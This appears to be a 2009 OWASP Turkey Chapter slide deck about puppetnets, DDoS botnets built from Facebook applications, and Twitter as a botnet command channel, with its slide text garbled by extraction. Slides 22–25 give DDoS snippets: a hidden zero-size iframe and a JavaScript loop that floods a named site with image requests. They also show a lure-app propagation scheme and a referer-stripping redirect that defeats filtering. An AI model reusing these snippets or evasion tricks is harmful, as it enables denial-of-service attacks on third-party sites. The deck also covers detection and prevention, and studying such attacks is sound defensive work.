Facebook, Twitter and Botnets

1
Facebook, Twitter and Botnets

• OWASP Turkey Chapter
• September 26 2009
• Istanbul

2
Botnet

• Collection of software robots, or bots, that run
  autonomously and automatically
• Botnet in its simplest form is an army of
  compromised computers that take orders from a
  botherder
• Botnets are arguably the biggest threat that the
  Internet community has faced
• Most popular Botnet Type IRC Channels based
  Botnets
• Lately Social Networking Sites based Botnets

3
Puppetnet

• Puppetnets rely on websites that coerce web
  browsers to participate in Malicious activities
• Such activities include
• distributed denial-of-service
• worm propagation
• reconnaissance probing
• Puppetnets exploit the high degree of flexibility
  granted to the mechanisms comprising the web
  architecture
• A website under the control of an attacker can
  thereby transform a collection of web browsers
  into a distributed system that is effectively
  controlled by the attacker
• Puppetnets can instruct any web browser to engage
  in malicious activities

4
Puppetnet

• Participation in puppetnets is dynamic
• Users join and participate unknowingly while
  surfing the net
• Easy to maintain a reasonable population, without
  the burden of having to look for new victims
• Harder for the defenders to track and filter out
  attacks, as puppets are likely to be relatively
  short-lived
• Only indirectly misuse browsers to attack third
  parties
• http//www.ics.forth.gr/dcs/Activities/papers/TISS
  EC.puppetnets.2007.pdf

5
Puppetnet Diagram
Atak komutlarini da iceren HTTP istek ve cevaplari
Atak Trafigi
Kurban Site
6
What can be done via Puppetnets

• Image Reference
• Loading image objects through Javascript
• Open up pop-up Windows
• Creation of Frames to load remote objects
• No browser that imposes restrictions on the
  location or type of the target referenced through
  these mechanisms

7
Puppetnet DDoS
Number of users concurrently viewing the
malicious page on their web browser
Amount of bandwidth each of these users can
generate towards the target server
Firepower of DDoS Attack

• What is more important?
• Size of Puppetnet ?
• Sufficient Firepower for a typical DDoS scenario?
• Determine how much traffic a browser can
  typically generate under the attackers command

8
Facebook

• Facebook is a global social networking website
  that is operated and privately owned by Facebook,
  Inc.
• Users can
• add friends
• send them messages
• update their personal profiles to notify friends
  about themselves
• join networks organized by city, workplace,
  school, and region

9
Application Development in Facebook

• Options while creating FaceBook applications
• Option1
• Port an existing application to FaceBook by using
  iframe
• Option2
• Develop an application by using FBML, FBJS, FQL
  and FB API
• Create an application in FaceBook
• FaceBook API
• Facebook Markup Language(FBML)
• Facebook Query Language(FQL)
• Facebook Javascript(FBJS)

10
Facebook Application (How does it work?)

• Callback metaphor to interact with applications
• The URL of the application associated with a
  registered application in Facebook
• When the Facebook application URL requested,
  Facebook redirects the request to the server
• The application processes the request,
  communicates with Facebook using the Facebook
  Application Programming Interface (API) or
  Facebook Query Language (FQL)
• Returns Facebook Markup Language (FBML) to
  Facebook for presentation

11
Facebook Dynamics

• FaceBook API
• Web services programming interface for accessing
  core services
• profile
• friends
• group
• event
• photo
• Performs other Facebook-centric functionality
• log in
• redirect
• update view
• Facebook Markup Language (FBML)
• HTML-like language
• Display pages inside of the Facebook canvas

12
Facebook Dynamics

• Facebook Query Language (FQL)
• SQL-based interface into Facebook data.
• Similar to standard SQL
• Access many Facebook database tables
• user
• friend
• group
• group_member
• event
• event_member
• photo
• album
• photo_tag
• Restrictions
• SELECT statements must be performed one table at
  a time
• Join queries are not permitted
• Queries must be indexable.

13
Facebook Dynamics

• Facebook Javascript (FBJS)
• Allows limited scripting functionality
• Alternative DOM implementation
• Similar to Standard JavaScript
• Differs from standard JavaScript
• While accessing a JavaScript property (such as
  document.href), FBJS uses a pair of get and set
  methods instead (getHref, setHref)
• While processing scripting code inside of script
  elements, tacks on the application ID to function
  and variable names
• Prevents the ability to run any javascript code
  you want
• FBJS transformed on the fly into JavaScript as
  the page is loaded
• All variables and functions are prepended with a
  string like "xyz3455679_
• Restriction on what can be done with DOM elements
• Avoids cross-site-scripting attacks and hostile
  user behavior

14
Facebook Platform

• Standards-based programming framework
• Enables developers to create applications that
  interact and integrate with core Facebook
  services
• Facebook applications are not installed directly
  onto the Facebook server. Instead, they are
  placed on the developers server
• Facebook applications are called by Facebook when
  the application URL is requested

15
Facebook Application Diagram (How does it work?)
16
What kind of a Facebook Application?

• A simple application?
• A popular application?
• Game or Utility?
• Fan based Program?
• Continuous Usage?
• A program that creates Programs?
• TOS?

17
Facebook-TOS

• http//www.facebook.com/terms.php
• Privacy
• Sharing Your Content and Information
• Safety
• Registration and Account Security
• Protecting Other People's Rights
• Mobile
• Payments
• Special Provisions Applicable to Share Links
• Special Provisions Applicable to
  Developers/Operators of Applications and Websites
  
• About Advertisements on Facebook
• Special Provisions Applicable to Advertisers
• Special Provisions Applicable to Pages

18
Facebook - TOS - Safety

• Safety
• You will not upload viruses or other malicious
  code.
• You will not collect users' content or
  information, or otherwise access Facebook, using
  automated means (such as harvesting bots, robots,
  spiders, or scrapers) without our permission.
• You will not use Facebook to do anything
  unlawful, misleading, malicious, or
  discriminatory.
• You will not do anything that could disable,
  overburden, or impair the proper working of
  Facebook, such as a denial of service attack.

19
Facebook - TOS - Provisions Applicable to
Developers

• Special Provisions Applicable to
  Developers/Operators of Applications and Websites
  
• You will only request data you need to operate
  your application.
• You will not use, display, or share a user's data
  in a manner inconsistent with the user's privacy
  settings.
• You will delete all data you received from
  Facebook if we disable your application or ask
  you to do so.

20
Facebook Revocation Email
21
Botnet Creation in Facebook

• Image Reference
• Inline linking
• Use of a linked object (usually an image)
• Using it from one site into a web page belonging
  to a second site
• The second site is said to have an inline link to
  the site where the object is located
• When a web site is visited
• Browser first downloads the textual content in
  the form of an HTML document
• The downloaded HTML document may call for other
  HTML files to be processed
• It also permits absolute URLs that refer to
  images hosted on other servers (ltimg
  src"http//www.example.com/picture.jpg" /gt)
• When a browser downloads an HTML page containing
  such an image, the browser will contact the
  remote server to request the image content

22
Botnet Creation in Facebook

• Image Reference
• A single line like
• echo "ltfbiframe frameborder\"0\" width0px
  height0px src\"http//www.w3schools.com/js/venus
  .jpg\" /gt"
• Good enough to create a DDOS Attack to the src
  Victim Site being w3schools.com in the above
  example
• An iframe which downloads an image with a width
  and height set to 0px
• Browser fetches the page above and does not show
  it
• Change width and height and see the picture

23
Botnet Creation in Facebook

• How to Create a large number of requests to the
  target site ?
• Embed a sequence of image references in the
  malicious webpage, which can be done using either
  a sequence of IMG SRC instructions
• JavaScript loop that instructs the browser to
  load objects from the target server
• Loading image objects through Javascript
• ltSCRIPTgt
• pic new Image(10,10)
• function DDOS()
• var now new Date()
• pic.src'http//www.w3schools.com/js?'now.getTi
  me()
• setTimeout ( "DDOS()", 10 )
• return
• lt/SCRIPTgt
• ltIFRAME name'parent' width"0" src"page.htm"
  onLoad"DDOS()"gt
• lt/IFRAMEgt

24
Propagation of Facebook Botnet

• Create an Application
• Make it nice and fun !(Really important)
• Advertise it by using Facebook features
• News Feed
• Invitation(Limit 20 a day)
• invite_text htmlentities(invite_text)
• echo "ltfbrequest-form type'Kim Silmis'
  content'invite_text' action'index.php'
  method'POST' invite'true' gt"
• echo "ltfbmulti-friend-selector
  showborder'true' max '20' actiontext'Kim
  Silmis programi ile sizi arkadas listesinden
  silenleri görmek ister misiniz?'
  exclude_ids'exclude_list' gt"
• echo "lt/fbrequest-formgt"
• Notification
• facebook-gtapi_client-gtnotifications_send(friends
  1, 'Kim silmis kullaniyor. Siz de lta
• href"http//apps.facebooks.com/kilsilmis"gtKim
  silmislt/agt kullanarak zevkle zaman
  geçirebilirsiniz. ')

25
Detection of Facebook Botnet

• Victim host must filter out all incoming traffic
  introduced by Facebook users.
• Use the referer field of the HTTP requests
• Determine whether a request originates from
  facebook.com or not
• Stop the attack traffic accordingly
• Possible for a Facebook application developer to
  overcome this situation
• srchttp//attack-host/dummy-page?refvictim-host
  /image1.jpg
• lt?php
• if (_GET"ref") ref_GET"ref"
• print("ltmeta http-equivrefresh
• content0 urlrefgt")
• ?gt

26
Prevention of Facebook Botnet

• Social network providers should be careful with
  the use of client side technologies, like
  JavaScript, etc.
• Social network operator should provide developers
  with a strict API, which is capable of giving
  access to resources only related to the system.
• Applications should run in an isolated
  environment imposing constraints to prevent the
  application from interacting with other Internet
  hosts
• Facebook Platform can cancel the use of fbiframe
  tag, as this tag is used to load images hosted at
  the victim host.

27
Facebook PoC Facebot

• www.ics.forth.gr/dcs/Activities/papers/facebot.isc
  08.pdf

28
Twitter

• Free social networking and micro-blogging service
  
• Enables users to send and read messages known as
  tweets
• Tweets are text-based posts of up to
  140 characters displayed on the author's profile
  page and delivered to the author's followers
• Senders can restrict delivery to those in their
  circle of friends or allow open access

29
Twitter

• Profile(Name, Location, Bio)
• Find People(Twitter, Other Networks, Emails,
  Suggested Users)
• _at_
• RT
• Direct Message
• http//search.twitter.com
• Favorites
• RSS

30
Twitter Botnet?

• Reasons
• Ability to hide random commands in the large
  amount of data that is generated each day
• A really good API that would make integration
  easy
• Ideas
• Option1 A protected twitter account that only
  the bots could read.
• Restriction on who could see the commands ?
• Easy for Twitter to block the user
• PoC supposedly exists
• Option2 Send Commands to random accounts and
  then have the Bot use the search feature to find
  the commands.
• Harder for Twitter to block the messages as the
  commands could be posted from any account to any
  other account.
• Bot would have to have a way to spot the commands
  in the general mess of other tweets out there.
• If the bot can spot the commands then Twitter
  could also do the same matching and automatically
  drop those tweets.
• Use seemingly innocent commands, such as "check
  out this link ..." instead of saying download a
  file
• Innocent commands would be hard for Twitter to
  block without upsetting legitimate users
• Additional Suggestions
• Using TinyURL to obfuscate commands
• Using hash tags to represent certain things
• Making bots to follow certain accounts to mark
  themselves as bots.

31
Twitter - POC

• Proof of Concept bot which uses Twitter as its
  Command and Control channel at http//www.digininj
  a.org/projects/kreiosc2.php
• Waiting for Defcon 2009 Video Presented by Kevin
  Johnson and Tom Eston

32
Tesekkurler

• Ibrahim Halil Saruhan
• Facebook halilsaru_at_gmail.com
• E-Mail ibrahimsaruhan_at_gmail.com

33
Sorular

• ?